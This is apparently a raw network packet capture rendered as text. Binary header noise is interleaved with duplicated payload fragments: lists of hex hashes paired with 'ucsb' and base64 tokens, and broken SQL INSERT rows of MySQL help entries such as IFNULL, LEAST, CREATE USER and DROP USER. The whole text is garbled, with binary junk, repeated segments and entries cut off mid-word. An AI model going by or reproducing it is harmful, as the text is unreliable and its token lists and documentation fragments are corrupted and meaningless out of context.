A41C2460349A799682067BDEF1B26D5E,ucsb,MTNzEwEDAB8MxLptoFxZWWLONviw7aiX8cTnuA==
2FB4CD7A776BFFB31BFBDCF67B2DCA2C,ucsb,MTNzEwEDACCQeRbhSSw7cjBy8DaFYfyeUuFTmw==
2D6B84493159ACBBCC5C2BBEAC4EBB6E,ucsb,MTNzEwEDACHU/68AEPZtmlTIPKai8WWhdQ4dDg==
95BC44CD499E2CEFA1F12CB1622C05F9,ucsb,MTNzEwEDACJZWz9Bb/2VN6d/FWfvpfmMmc2hpg==
E2A73B65056154DDBBE77DB3BB9243F5,ucsb,MTNzEwEDACPTDN3ubsCmiCOTpvRPKiXD53LhUw==
A1D372A662C7FDC616DA11D9CA9CE3B8,ucsb,MTNzEwEDACRyNFHMPqwDfM1ZehXC7t8QIfKo7g==
7CF6EDA78A57907FCD6ADE77AFC59B6D,ucsb,MTNzEwEDACXEFbhizVkHbqhcmj7Wuf6SmUi9Rw==
17E95A1222B98307F4FAA051A57238D4,ucsb,MTNzEwEDACZMILK5KbsNDSaeu9eWT47uy/bTZA==
E61CF05481ACAA1AB6498F3622254D65,ucsb,MTNzEwEDACfAM6/dL5lHKnuhxBoEZ4+6qIiz1g==
28C2B3E7995E0913CE3901719F5BC44C,ucsb,MTNzEwEDACgs2NQpJui8dSK/sPCL ZZBi0`EL@/܂Sŀo0E4\G@?8 3 Pu}UD$O: )NCL bb0`BiET@/o0AE<@@  Pԙ: Q '<d 1572D89077E,ucsb,MTNzEwEDABkXN6rFA7+obUwCykKP1/iEX27FmA==
398A55552AE3CD480086FD7464083E51,ucsb,MTNzEwEDABqayREx95cmtSQ+tjUX7CPdcuVVgQ==
F813A562CCDFEF404A954AFB07265DD3,ucsb,MTNzEwEDABvMmVkWeNjHdpfgSU2DQ30rlUhH5w==
ACFA8F2FEF458C3077E4DE1DA8EC54A5,ucsb,MTNzEwEDABzIiMDMZFAA7Uhp5ieDWi7etdpTAg==
80C0E14C98EC26F8A549154E6C30B465,ucsb,MTNzEwEDAB1xZ9+jWJVO792AbSToHe/8o4dUHQ==
CB4CEB3F7E8D397AA490A4DE9D067287,ucsb,MTNzEwEDAB4MunJOHC0bSsJ/hXOmTwclj4SZPw==
A41C2460349A799682067BDEF1B26D5E,ucsb,MTNzEwEDAB8MxLptoFxZWWLONviw7aiX8cTnuA==
2FB4CD7A776BFFB31BFBDCF67B2DCA2C,ucsb,MTNzEwEDACCQeRbhSSw7cjBy8DaFYfyeUuFTmw==
2D6B84493159ACBBCC5C2BBEAC4EBB6E,ucsb,MTNzEwEDACHU/68AEPZtmlTIPKai8WWhdQ4dDg==
95BC44CD499E2CEFA1F12CB1622C05F9,ucsb,MTNzEwEDACJZWz9Bb/2VN6d/FWfvpfmMmc2hpg==
E2A73B65056154DDBBE77DB3BB9243F5,ucsb,MTNzEwEDACPTDN3ubsCmiCOTpvRPKiXD53LhUw==
A1D372A662C7FDC616DA11D9CA9CE3B8,ucsb,MTNzEwEDACRyNFHMPqwDfM1ZehXC7t8QIfKo7g==
7CF6EDA78A57907FCD6ADE77AFC59B6D,ucsb,MTNzEwEDACXEFbhizVkHbqhcmj7Wuf6SmUi9Rw==
17E95A1222B98307F4FAA051A57238D4,ucsb,MTNzEwEDACZMILK5KbsNDSaeu9eWT47uy/bTZA==
E61CF05481ACAA1AB6498F3622254D65,ucsb,MTNzEwEDACfAM6/dL5lHKnuhxBoEZ4+6qIiz1g==
28C2B3E7995E0913CE3901719F5BC44C,ucsb,MTNzEwEDACgs2NQpJui8dSK/sPCL ZZ0`BiEL@/go0AE4\G@@8 3 Pu}UD$O: )NC5M bbBi0`ET@/p܂Ao0E<@?x  3Ptj  )=th August 06:22:58 2003\'',''),(47,'MEDIUMBLOB',1,' MEDIUMBLOB\n\nA BLOB column with a maximum length of 16,777,215\n(2^24 - 1) bytes.\n','',''),(48,'IFNULL',9,' IFNULL(expr1,expr2)\nIf expr1 is not NULL, IFNULL() returns expr1,\nelse it returns expr2. IFNULL() returns a numeric or string\nvalue, depending on the context in which it is used.\n','mysql> SELECT IFNULL(1,0);\n -> 1\nmysql> SELECT IFNULL(NULL,10);\n -> 10\nmysql> SELECT IFNULL(1/0,10);\n -> 10\nmysql> SELECT IFNULL(1/0,\'yes\');\n -> \'yes\'',''),(49,'LEAST',26,' LEAST(value1,value2,...)\nWith two or more arguments, returns the smallest (minimum-valued) argument.\nThe arguments are compared using the following rules.\n\n --- If the return value is used in an INTEGER context or all arguments\nare integer-valued, they are compared as integers.\n\n --- If the return value is used in a REAL context or all arguments are\nreal-valued, they are compared as reals.\n\n --- If any argument is a case-sensitive string, the arguments are compared\nas case-sensitive strings.\n\n --- In other cases, the arguments are compared as case-insensitive strings.\n','mysql> SELECT LEAST(2,0);\n -> 0\nmysql> SELECT LEAST(34.0,3.0,5.0,767.0);\n -> 3.0\nmysql> SELECT LEAST(\'B\',\'A\CPM bb0`BiET@/Ԁo0SE<@@w  3Ptj  )=th August 06:22:58 2003\'',''),(47,'MEDIUMBLOB',1,' MEDIUMBLOB\n\nA BLOB column with a maximum length of 16,777,215\n(2^24 - 1) bytes.\n','',''),(48,'IFNULL',9,' IFNULL(expr1,expr2)\nIf expr1 is not NULL, IFNULL() returns expr1,\nelse it returns expr2. IFNULL() returns a numeric or string\nvalue, depending on the context in which it is used.\n','mysql> SELECT IFNULL(1,0);\n -> 1\nmysql> SELECT IFNULL(NULL,10);\n -> 10\nmysql> SELECT IFNULL(1/0,10);\n -> 10\nmysql> SELECT IFNULL(1/0,\'yes\');\n -> \'yes\'',''),(49,'LEAST',26,' LEAST(value1,value2,...)\nWith two or more arguments, returns the smallest (minimum-valued) argument.\nThe arguments are compared using the following rules.\n\n --- If the return value is used in an INTEGER context or all arguments\nare integer-valued, they are compared as integers.\n\n --- If the return value is used in a REAL context or all arguments are\nreal-valued, they are compared as reals.\n\n --- If any argument is a case-sensitive string, the arguments are compared\nas case-sensitive strings.\n\n --- In other cases, the arguments are compared as case-insensitive strings.\n','mysql> SELECT LEAST(2,0);\n -> 0\nmysql> SELECT LEAST(34.0,3.0,5.0,767.0);\n -> 3.0\nmysql> SELECT LEAST(\'B\',\'A\CQ bbBi0`ET@/ԂSŀo0E<@?  Pԙ:  '<d6S9L5V0op5ow==
6E4462D79AED1A1B9B23C6968185E7B4,ucsb,MTNzEwEDACm3G75Jf06Rwg9EdBbsJU0A6668Vg==
AC78BFD6BBFF75BBC1DA367CA7685386,ucsb,MTNzEwEDACoCFxBzmhcns1rKVY6GDVaU/Oq6YQ==
C309086E8DFE2A9D4B9573FF60D23DDD,ucsb,MTNzEwEDACtnJQSIZZBQAAN1sDtpb+XVhLEkbA==
24A4B9DFF84F28227961E71D629FBCBC,ucsb,MTNzEwEDACzsPeixlqLkLCX/pMJT/xC9CFhwtw==
74A1C6847AA93AC251AA0380E313D679,ucsb,MTNzEwEDAC0vdaQhs88l4EbVpuQZVoNA+e89iA==
CF7F2675C0256C2A53004ADDB259BE0B,ucsb,MTNzEwEDAC6m5N0NEkh1YjxWGOq+InkFyEu9NQ==
CD8C86312A91936D1226F2103A92F13E,ucsb,MTNzEwEDAC8SpobQHaxTEvLxnfa9SyX/F0A59g==
588FAB064D81C5527EEFA281BBB596D8,ucsb,MTNzEwEDADDvzSvvhpS3STdRmmssLPlzQKxv4w==
EE108F87CD73C7A5F95EBCB4C0044828,ucsb,MTNzEwEDADGCKnCPGYOB/4fz2pQY7Ky2bt/tRA==
B8FB934E142E8154F21603106C76D9DC,ucsb,MTNzEwEDADIRerItyD2CedbXY/osmrpUSSMwWg==
97AFC773FD0056C5AFF07BF55E05B869,ucsb,MTNzEwEDADP4BNv7AA5KciCM/aD1eTxIt4Yciw==
21BCDD5E620966CCE41166D198688DC7,ucsb,MTNzEwEDADR9V/UehNDB9ezohVsVYXcqp1g6ag==
F588A2DC439D0F83769F6DDEFE28BC5F,ucsb,MTNzEwEDADW1oJrSJaLshfLnR6VCoRhn8FBpsA==
452E9041A915CAD963CF2D0CE2C13C92,ucsb,MTNzEwEDADZ/EvJ2PcDqW5uF3E3HPX7dvL64pw==
CE8DB2CD14916E3B8DBB1DD732D35627,ucsb,MTNzEwEDADfqiyfIw7QHWkDguxXDJpsnw/ovhg==
0B93DEF8191353A243C141FAC5Q bb0`BiET@/o0AE<@@  Pԙ:  '<d6S9L5V0op5ow==
6E4462D79AED1A1B9B23C6968185E7B4,ucsb,MTNzEwEDACm3G75Jf06Rwg9EdBbsJU0A6668Vg==
AC78BFD6BBFF75BBC1DA367CA7685386,ucsb,MTNzEwEDACoCFxBzmhcns1rKVY6GDVaU/Oq6YQ==
C309086E8DFE2A9D4B9573FF60D23DDD,ucsb,MTNzEwEDACtnJQSIZZBQAAN1sDtpb+XVhLEkbA==
24A4B9DFF84F28227961E71D629FBCBC,ucsb,MTNzEwEDACzsPeixlqLkLCX/pMJT/xC9CFhwtw==
74A1C6847AA93AC251AA0380E313D679,ucsb,MTNzEwEDAC0vdaQhs88l4EbVpuQZVoNA+e89iA==
CF7F2675C0256C2A53004ADDB259BE0B,ucsb,MTNzEwEDAC6m5N0NEkh1YjxWGOq+InkFyEu9NQ==
CD8C86312A91936D1226F2103A92F13E,ucsb,MTNzEwEDAC8SpobQHaxTEvLxnfa9SyX/F0A59g==
588FAB064D81C5527EEFA281BBB596D8,ucsb,MTNzEwEDADDvzSvvhpS3STdRmmssLPlzQKxv4w==
EE108F87CD73C7A5F95EBCB4C0044828,ucsb,MTNzEwEDADGCKnCPGYOB/4fz2pQY7Ky2bt/tRA==
B8FB934E142E8154F21603106C76D9DC,ucsb,MTNzEwEDADIRerItyD2CedbXY/osmrpUSSMwWg==
97AFC773FD0056C5AFF07BF55E05B869,ucsb,MTNzEwEDADP4BNv7AA5KciCM/aD1eTxIt4Yciw==
21BCDD5E620966CCE41166D198688DC7,ucsb,MTNzEwEDADR9V/UehNDB9ezohVsVYXcqp1g6ag==
F588A2DC439D0F83769F6DDEFE28BC5F,ucsb,MTNzEwEDADW1oJrSJaLshfLnR6VCoRhn8FBpsA==
452E9041A915CAD963CF2D0CE2C13C92,ucsb,MTNzEwEDADZ/EvJ2PcDqW5uF3E3HPX7dvL64pw==
CE8DB2CD14916E3B8DBB1DD732D35627,ucsb,MTNzEwEDADfqiyfIw7QHWkDguxXDJpsnw/ovhg==
0B93DEF8191353A243C141FACQ bbBi0`ET@/ԂSŀo0E<@?  Pԙ:  '<dB64DFC55,ucsb,MTNzEwEDADjFRxScz77lQTzcA0smlgch20+Zjw==
DB98D4DB92DF51B9B81B9166369BBBAA,ucsb,MTNzEwEDADlcuMU/Ngfb7E/GXKWhKkPy01Wlew==
AE78AAFB1A32ED86B2C67E0AE7734E32,ucsb,MTNzEwEDADq54EkBPYFpqyzmgSTtBW6UTLfgNQ==
4BD91EA96291F5B08A63C724D0F7EB10,ucsb,MTNzEwEDADsC+EdMKIOLjNmXF0mATL3SqojbXQ==
6A425D6CBF3857EBB2AD74068C0B3290,ucsb,MTNzEwEDADyfjVARnpsH33nL5I1Z6YZlcDDRkw==
D3FCF1D33EF35D8C2C8A17F4CE97F733,ucsb,MTNzEwEDAD37Y1fgLduQof19pamATJp2ahsDtA==
87F3186385C8FAF97A9E26E6C01F4486,ucsb,MTNzEwEDAD5k1RndWEiKQJlSrg+vkqab0fgI5w==
5367D535470E85925F26ECA11C2659A7,ucsb,MTNzEwEDAD/FE2pEEURONgd05dBuPQMEf5wWxQ==
E1C801BCF63B760FC9B0FC8C5AA3FB13,ucsb,MTNzEwEDAEDqZi0TxhXFo/Y6XcnnuwGyMDehfA==
F661B2660D8B17F3155A5B8CA1C73E9C,ucsb,MTNzEwEDAEHvDYV7c73Vi6iyDZA31t0Jkwpe6Q==
587DF422ACAE3DD5422CAA5126918836,ucsb,MTNzEwEDAEI9cOttqIDkMg0WegAweXveruwqAw==
83ECCB6D66ACF98934EF9D1B16D1E437,ucsb,MTNzEwEDAEPW/O56bVwKxanBWbxNHC7e1/FNSA==
9C1136D9539BA26F61ECF39D535C0657,ucsb,MTNzEwEDAETY/ja8cwFo7w3qwQtsdY3tPiZCxw==
42D19DB788206D0C93A81C1D562E5250,ucsb,MTNzEwEDAEX4zQJcUGJX5TYZZ071sNoV808FUQ==
E2CEBBC25BEC0C52AD785579FA1E3DFF,ucsb,MTNzEwEDAEZmiZVS4v3QigY3gdM8LKkgtR/bow==
885DFDC65A602A70EB95A17D5410B0B1,ucsb,MTNzEwEDAEf0R4dk4hRD1eK/hBVHbCQ bb0`BiET@/o0AE<@@  Pԙ:  '<dB64DFC55,ucsb,MTNzEwEDADjFRxScz77lQTzcA0smlgch20+Zjw==
DB98D4DB92DF51B9B81B9166369BBBAA,ucsb,MTNzEwEDADlcuMU/Ngfb7E/GXKWhKkPy01Wlew==
AE78AAFB1A32ED86B2C67E0AE7734E32,ucsb,MTNzEwEDADq54EkBPYFpqyzmgSTtBW6UTLfgNQ==
4BD91EA96291F5B08A63C724D0F7EB10,ucsb,MTNzEwEDADsC+EdMKIOLjNmXF0mATL3SqojbXQ==
6A425D6CBF3857EBB2AD74068C0B3290,ucsb,MTNzEwEDADyfjVARnpsH33nL5I1Z6YZlcDDRkw==
D3FCF1D33EF35D8C2C8A17F4CE97F733,ucsb,MTNzEwEDAD37Y1fgLduQof19pamATJp2ahsDtA==
87F3186385C8FAF97A9E26E6C01F4486,ucsb,MTNzEwEDAD5k1RndWEiKQJlSrg+vkqab0fgI5w==
5367D535470E85925F26ECA11C2659A7,ucsb,MTNzEwEDAD/FE2pEEURONgd05dBuPQMEf5wWxQ==
E1C801BCF63B760FC9B0FC8C5AA3FB13,ucsb,MTNzEwEDAEDqZi0TxhXFo/Y6XcnnuwGyMDehfA==
F661B2660D8B17F3155A5B8CA1C73E9C,ucsb,MTNzEwEDAEHvDYV7c73Vi6iyDZA31t0Jkwpe6Q==
587DF422ACAE3DD5422CAA5126918836,ucsb,MTNzEwEDAEI9cOttqIDkMg0WegAweXveruwqAw==
83ECCB6D66ACF98934EF9D1B16D1E437,ucsb,MTNzEwEDAEPW/O56bVwKxanBWbxNHC7e1/FNSA==
9C1136D9539BA26F61ECF39D535C0657,ucsb,MTNzEwEDAETY/ja8cwFo7w3qwQtsdY3tPiZCxw==
42D19DB788206D0C93A81C1D562E5250,ucsb,MTNzEwEDAEX4zQJcUGJX5TYZZ071sNoV808FUQ==
E2CEBBC25BEC0C52AD785579FA1E3DFF,ucsb,MTNzEwEDAEZmiZVS4v3QigY3gdM8LKkgtR/bow==
885DFDC65A602A70EB95A17D5410B0B1,ucsb,MTNzEwEDAEf0R4dk4hRD1eK/hBVHbCR bbBi0`ET@/p܂Ao0E<@?x  3Ptj  )>',\'C\');\n -> \'A\'',''),(50,'=',26,' =\nEqual:\n','mysql> SELECT 1 = 0;\n -> 0\nmysql> SELECT \'0\' = 0;\n -> 1\nmysql> SELECT \'0.0\' = 0;\n -> 1\nmysql> SELECT \'0.01\' = 0;\n -> 0\nmysql> SELECT \'.01\' = 0.01;\n -> 1',''),(51,'REVERSE',23,' REVERSE(str)\nReturns the string str with the order of the characters reversed.\n','mysql> SELECT REVERSE(\'abc\');\n -> \'cba\'',''),(52,'ISNULL',26,' ISNULL(expr)\nIf expr is NULL, ISNULL() returns 1, otherwise\nit returns 0.\n','mysql> SELECT ISNULL(1+1);\n -> 0\nmysql> SELECT ISNULL(1/0);\n -> 1',''),(53,'BINARY',1,' BINARY(M)\n\nThe BINARY type is similar to the CHAR type, but stores\nbinary byte strings rather than non-binary character strings.\n\nThis type was added in MySQL 4.1.2.\n','',''),(54,'BOUNDARY',19,' Boundary(g)\nReturns a geometry that is the closure of the combinatorial boundary of the\ngeometry value g.\n','',''),(55,'CREATE USER',7,'The CREATE USER statement creates new MySQL accounts. To use it, you\nmust have the global CREATE USER privilege or the INSERT\nprivilege for the mysql database.\nFor each account, CREATE USER creates a new record in the\nmysql.user table that has no privileges. An error occurs if the\naccount already eCR ZZBi0`EL@/Plo0E4@@?  3P<!p  y'C%R ZZBi0`EL@/$T<o0E4@?  nPy9; W~7=wʌC>R bb0`BiET@/Ԁo0SE<@@w  3Ptj  )>',\'C\');\n -> \'A\'',''),(50,'=',26,' =\nEqual:\n','mysql> SELECT 1 = 0;\n -> 0\nmysql> SELECT \'0\' = 0;\n -> 1\nmysql> SELECT \'0.0\' = 0;\n -> 1\nmysql> SELECT \'0.01\' = 0;\n -> 0\nmysql> SELECT \'.01\' = 0.01;\n -> 1',''),(51,'REVERSE',23,' REVERSE(str)\nReturns the string str with the order of the characters reversed.\n','mysql> SELECT REVERSE(\'abc\');\n -> \'cba\'',''),(52,'ISNULL',26,' ISNULL(expr)\nIf expr is NULL, ISNULL() returns 1, otherwise\nit returns 0.\n','mysql> SELECT ISNULL(1+1);\n -> 0\nmysql> SELECT ISNULL(1/0);\n -> 1',''),(53,'BINARY',1,' BINARY(M)\n\nThe BINARY type is similar to the CHAR type, but stores\nbinary byte strings rather than non-binary character strings.\n\nThis type was added in MySQL 4.1.2.\n','',''),(54,'BOUNDARY',19,' Boundary(g)\nReturns a geometry that is the closure of the combinatorial boundary of the\ngeometry value g.\n','',''),(55,'CREATE USER',7,'The CREATE USER statement creates new MySQL accounts. To use it, you\nmust have the global CREATE USER privilege or the INSERT\nprivilege for the mysql database.\nFor each account, CREATE USER creates a new record in the\nmysql.user table that has no privileges. An error occurs if the\naccount already eCPR ZZ0`BiEL@/܀o0SE4@@@  3P<!p  y'CcR ZZʪBiEL@/o0o0oE4@@  nPy9; W~7=wʌCZ bbBi0`ET@/ԂSŀo0E<@?  Pԙ: m '<dyY9IRHzQQ==
A53BE19736C9A35ADDEB367BFC427130,ucsb,MTNzEwEDAEjz6IDwNuba+3rNcwHdzD8UgMVyRQ==
11093B8D3FD384E963DB4 fa0 9DE22A497FB,ucsb,MTNzEwEDAEljt9HmzfZXFrhlpUJyCpNRUKa14g==
1380B0A3B9945C2BA9BA73E894CCDB22,ucsb,MTNzEwEDAErJ/E6vkN2h+V0cKNT3Pl5n0lwxqw==
238D0D9A403ED002F7E469688A44EA98,ucsb,MTNzEwEDAEt/KCc22AlylGl5xs9T5AW2nyGzWQ==
10F24082F363F02E333B40F7ED8CCCA3,ucsb,MTNzEwEDAEyW4Ctj/0rWplraKlpS7JxmPesYaQ==
30452762FC1D782B786E52CF11FBCE4F,ucsb,MTNzEwEDAE2BtcsOcl0TgQ7exPII235NhHRKew==
327A0DC379CECB7E9E063B36AF06490A,ucsb,MTNzEwEDAE4esCrN6+SkcFaJHtviln44A7+2HQ==
B97E39B8632F1B6B6C2ECD87D72990C1,ucsb,MTNzEwEDAE9CuTdNMuqdXF3kLqcJpthN+pgI2A==
87B64C59BA0E8CBCC0F69542FE67B86A,ucsb,MTNzEwEDAFBj7TGxB0lIMVIJMyFtAhopPh/kag==
B203F40F509F3965C04D15385951BC95,ucsb,MTNzEwEDAFHAXgP4aalffCNrc3xU4UTwH9Qspg==
F37F5DD14E4D01946E116837C0620164,ucsb,MTNzEwEDAFLk272JFqxP7gNOpYKDuYCeLhKVbg==
009DDF4E6988D3A5FD80404605B5EC9E,ucsb,MTNzEwEDAFOGLUWsV3+jwz51FUe+ClPpgrUdqw==
F751CDEC02F1A39841736AE15F06B65A,ucsb,MTNzEwEDAFRKLc0sNa5qNuhdpCDa8Wj3TsbkyQ==
9AC9038D188A441F478C1E62C606AD9F,ucsb,MTNzEwEDAFXRpW+x7PVLhXsUuMpNhMEZm/d4QQ==
19DAF0E492A2B7C4C48D60BA1F0D74CB,ucsb,MTNzEwEDAFZ02SJZRFr6Q4OJVh3Kwxv+joF5qQ==
342A1C26352BF5E91D5CCZ bb0`BiET@/o0AE<@@  Pԙ: m '<dyY9IRHzQQ==
A53BE19736C9A35ADDEB367BFC427130,ucsb,MTNzEwEDAEjz6IDwNuba+3rNcwHdzD8UgMVyRQ==
11093B8D3FD384E963DB4 fa0 9DE22A497FB,ucsb,MTNzEwEDAEljt9HmzfZXFrhlpUJyCpNRUKa14g==
1380B0A3B9945C2BA9BA73E894CCDB22,ucsb,MTNzEwEDAErJ/E6vkN2h+V0cKNT3Pl5n0lwxqw==
238D0D9A403ED002F7E469688A44EA98,ucsb,MTNzEwEDAEt/KCc22AlylGl5xs9T5AW2nyGzWQ==
10F24082F363F02E333B40F7ED8CCCA3,ucsb,MTNzEwEDAEyW4Ctj/0rWplraKlpS7JxmPesYaQ==
30452762FC1D782B786E52CF11FBCE4F,ucsb,MTNzEwEDAE2BtcsOcl0TgQ7exPII235NhHRKew==
327A0DC379CECB7E9E063B36AF06490A,ucsb,MTNzEwEDAE4esCrN6+SkcFaJHtviln44A7+2HQ==
B97E39B8632F1B6B6C2ECD87D72990C1,ucsb,MTNzEwEDAE9CuTdNMuqdXF3kLqcJpthN+pgI2A==
87B64C59BA0E8CBCC0F69542FE67B86A,ucsb,MTNzEwEDAFBj7TGxB0lIMVIJMyFtAhopPh/kag==
B203F40F509F3965C04D15385951BC95,ucsb,MTNzEwEDAFHAXgP4aalffCNrc3xU4UTwH9Qspg==
F37F5DD14E4D01946E116837C0620164,ucsb,MTNzEwEDAFLk272JFqxP7gNOpYKDuYCeLhKVbg==
009DDF4E6988D3A5FD80404605B5EC9E,ucsb,MTNzEwEDAFOGLUWsV3+jwz51FUe+ClPpgrUdqw==
F751CDEC02F1A39841736AE15F06B65A,ucsb,MTNzEwEDAFRKLc0sNa5qNuhdpCDa8Wj3TsbkyQ==
9AC9038D188A441F478C1E62C606AD9F,ucsb,MTNzEwEDAFXRpW+x7PVLhXsUuMpNhMEZm/d4QQ==
19DAF0E492A2B7C4C48D60BA1F0D74CB,ucsb,MTNzEwEDAFZ02SJZRFr6Q4OJVh3Kwxv+joF5qQ==
342A1C26352BF5E91D5CC\[ bbBi0`ET@/p܂Ao0E<@?x  3Ptj ] )>xists.\n\nThe account can be given a password with the optional IDENTIFIED\nBY clause. The user value and the password are given the same way\nas for the GRANT statement. In particular, to specify the password\nin plain text, omit the PASSWORD keyword. To specify the password\nas the hashed value as returned by the PASSWORD() function, include\nthe keyword PASSWORD.\nSee also : [GRANT, , GRANT].\n\nThe CREATE USER statement was added in MySQL 5.0.2.\n\n\n @subsubsection DROP USER Syntax\n\n\n\nDROP USER user [, user] ...\n\nThe DROP USER statement deletes one or more MySQL accounts.\nTo use it, you\nmust have the global CREATE USER privilege or the DELETE\nprivilege for the mysql database.\nEach account is named using the same format as for GRANT\nor REVOKE; for example, \'jeffrey\'@@\'localhost\'. The user and\nhost parts of the account name correspond to the User and Host\ncolumn values of the user table record for the account.\n\nDROP USER was added in MySQL 4.1.1 and originally removed only\naccounts that have no privileges. In MySQL 5.0.2, it was modified to also\nremove account privileges. This means that the procedure for removing an\naccount depends on your version of MySQL.\n\nAs of MySQL 5.0.2, remove an account and its privileges as follows:\n\nDROP Cw[ bb0`BiET@/Ԁo0SE<@@w  3Ptj ] )>xists.\n\nThe account can be given a password with the optional IDENTIFIED\nBY clause. The user value and the password are given the same way\nas for the GRANT statement. In particular, to specify the password\nin plain text, omit the PASSWORD keyword. To specify the password\nas the hashed value as returned by the PASSWORD() function, include\nthe keyword PASSWORD.\nSee also : [GRANT, , GRANT].\n\nThe CREATE USER statement was added in MySQL 5.0.2.\n\n\n @subsubsection DROP USER Syntax\n\n\n\nDROP USER user [, user] ...\n\nThe DROP USER statement deletes one or more MySQL accounts.\nTo use it, you\nmust have the global CREATE USER privilege or the DELETE\nprivilege for the mysql database.\nEach account is named using the same format as for GRANT\nor REVOKE; for example, \'jeffrey\'@@\'localhost\'. The user and\nhost parts of the account name correspond to the User and Host\ncolumn values of the user table record for the account.\n\nDROP USER was added in MySQL 4.1.1 and originally removed only\naccounts that have no privileges. In MySQL 5.0.2, it was modified to also\nremove account privileges. This means that the procedure for removing an\naccount depends on your version of MySQL.\n\nAs of MySQL 5.0.2, remove an account and its privileges as follows:\n\nDROP C_ bbBi0`ET@/ԂSŀo0E<@?  Pԙ: j '<d0BF69FD12DD2,ucsb,MTNzEwEDAFfOumBnNJIRE8kQs8/CD1LkwQNfmg==
BD51F6A61864510E06F52AD9A2428E8D,ucsb,MTNzEwEDAFjd8AWifH+c3Ph82lCgEIO9Zbwu6g==
8ED3470FAB25DC3438B492F0277DAC2B,ucsb,MTNzEwEDAFmh41gqLwv/o5sFEH3YPnonA/+BaA==
35545DDC73B4672640771697E924CCD6,ucsb,MTNzEwEDAFoY63L147ynY/9uACH1eeC14ebmHg==
8A730FF8CEBEF0ECC3C70AF3FAF445F1,ucsb,MTNzEwEDAFsCWF/d9MnGipDw9iv70XdE6ZFH+g==
8DADDD2FC016EADC3AC47F964E85A4FE,ucsb,MTNzEwEDAFypOgGdg3v2k9nL/1ZeN3DslbsSMA==
EC414CCF6E0EB992212DE3DAD09BF6BE,ucsb,MTNzEwEDAF2mqbgrvogRveFSWQXwjfr2BO0KTA==
71D10BDB1D9DDC0DB8764D14C18AE7A7,ucsb,MTNzEwEDAF5eTiNUgak5KxpZemIxr4yQOPkHGA==
CD6B2985B97427B32954A3888A620B33,ucsb,MTNzEwEDAF96+UKNg2GVClpgxkD1M0UXzVtmNg==
C9735C05E7DC5769A5B8367BF8D0651B,ucsb,MTNzEwEDAGAH5Wg+lQxfj95p/iArhHyoUIjIdg==
83FA88A0ED44FFBA6E17410F22A7808A,ucsb,MTNzEwEDAGEcuPzf1n53UL5ekV6P4qvyzWU6lg==
CCD9F0D04D71EF77A0216D965BB5453B,ucsb,MTNzEwEDAGLqOGk4LpvzzyD4/iqJnuudS7VssA==
E8413A28023016D7951FFCB1D0902983,ucsb,MTNzEwEDAGNsI/5XSisiIppT7fwNJvQDW5/Dag==
FC0038E75068CD190244FE8AB934A88C,ucsb,MTNzEwEDAGSZR3TSM5nm+8Rn0/Kt2PYvA2JtfQ==
D01F3472A7B3BEBF663AE96B6EDD7D14,ucsb,MTNzEwEDAGWRBE4gG5G2Z32yeDIboW39hFzBAQ==
AFC0FC791F4D0BE7C151EC7F47EB9F2C,ucsb,MTNzEwEDAGYJFR76dc3fWY3gPC_ ZZBi0`EL@/܂Sŀo0E4\I@?6 3 Pu}U T$E& )OC_ bb0`BiET@/o0AE<@@  Pԙ: j '<d0BF69FD12DD2,ucsb,MTNzEwEDAFfOumBnNJIRE8kQs8/CD1LkwQNfmg==
BD51F6A61864510E06F52AD9A2428E8D,ucsb,MTNzEwEDAFjd8AWifH+c3Ph82lCgEIO9Zbwu6g==
8ED3470FAB25DC3438B492F0277DAC2B,ucsb,MTNzEwEDAFmh41gqLwv/o5sFEH3YPnonA/+BaA==
35545DDC73B4672640771697E924CCD6,ucsb,MTNzEwEDAFoY63L147ynY/9uACH1eeC14ebmHg==
8A730FF8CEBEF0ECC3C70AF3FAF445F1,ucsb,MTNzEwEDAFsCWF/d9MnGipDw9iv70XdE6ZFH+g==
8DADDD2FC016EADC3AC47F964E85A4FE,ucsb,MTNzEwEDAFypOgGdg3v2k9nL/1ZeN3DslbsSMA==
EC414CCF6E0EB992212DE3DAD09BF6BE,ucsb,MTNzEwEDAF2mqbgrvogRveFSWQXwjfr2BO0KTA==
71D10BDB1D9DDC0DB8764D14C18AE7A7,ucsb,MTNzEwEDAF5eTiNUgak5KxpZemIxr4yQOPkHGA==
CD6B2985B97427B32954A3888A620B33,ucsb,MTNzEwEDAF96+UKNg2GVClpgxkD1M0UXzVtmNg==
C9735C05E7DC5769A5B8367BF8D0651B,ucsb,MTNzEwEDAGAH5Wg+lQxfj95p/iArhHyoUIjIdg==
83FA88A0ED44FFBA6E17410F22A7808A,ucsb,MTNzEwEDAGEcuPzf1n53UL5ekV6P4qvyzWU6lg==
CCD9F0D04D71EF77A0216D965BB5453B,ucsb,MTNzEwEDAGLqOGk4LpvzzyD4/iqJnuudS7VssA==
E8413A28023016D7951FFCB1D0902983,ucsb,MTNzEwEDAGNsI/5XSisiIppT7fwNJvQDW5/Dag==
FC0038E75068CD190244FE8AB934A88C,ucsb,MTNzEwEDAGSZR3TSM5nm+8Rn0/Kt2PYvA2JtfQ==
D01F3472A7B3BEBF663AE96B6EDD7D14,ucsb,MTNzEwEDAGWRBE4gG5G2Z32yeDIboW39hFzBAQ==
AFC0FC791F4D0BE7C151EC7F47EB9F2C,ucsb,MTNzEwEDAGYJFR76dc3fWY3gPC_ ZZ0`BiEL@/go0AE4\I@@6 3 Pu}U T$E& )OC_ bbBi0`ET@/ԂSŀo0E< @?  Pԙ:  '<dZXRRoHdPCEviA==
A69AD5FD0614BE5F78C400ABA77B85A9,ucsb,MTNzEwEDAGdbAoM7Gzl7cCqL8G0XAxv9dD3PLg==
08590CDE201C0505AB25D5F9FBF0981D,ucsb,MTNzEwEDAGg/jdCJYL8a2jXBjPjppzvFeXHc3g==
F2464B4A70B4576B9D845095C616C4ED,ucsb,MTNzEwEDAGlzhUQYvA7Ajrz5kYkOZXOjUq4skA==
3E5C3591E833B4E2B2D0F6D602D2B279,ucsb,MTNzEwEDAGoC2HjxIS1mt/Z1D5T3TO9UYxVdVQ==
57F7CA381A425580049D6DE42346727F,ucsb,MTNzEwEDAGsTNvFcbllFbjdVlB6Yka9A/lECgg==
7C5D941E4D505F891D3F81967B85D1B3,ucsb,MTNzEwEDAGwo7RRti/WKp2olee1rUhZ0xB52BQ==
A419D832F28B2CDCD2A6D9E722F503E2,ucsb,MTNzEwEDAG2LSCv498Z9LYFpBSB5ZrE3Q97XLQ==
9562BEF120AE2B9A3E6638E9DD764FEA,ucsb,MTNzEwEDAG5cUtQb5l6Bxi5Qc0az2W3rTufbtA==
A31F32D567E79A25BC5CAD2B5E327E62,ucsb,MTNzEwEDAG/loEkmsfIphpeZRYaL6bZBjyduJw==
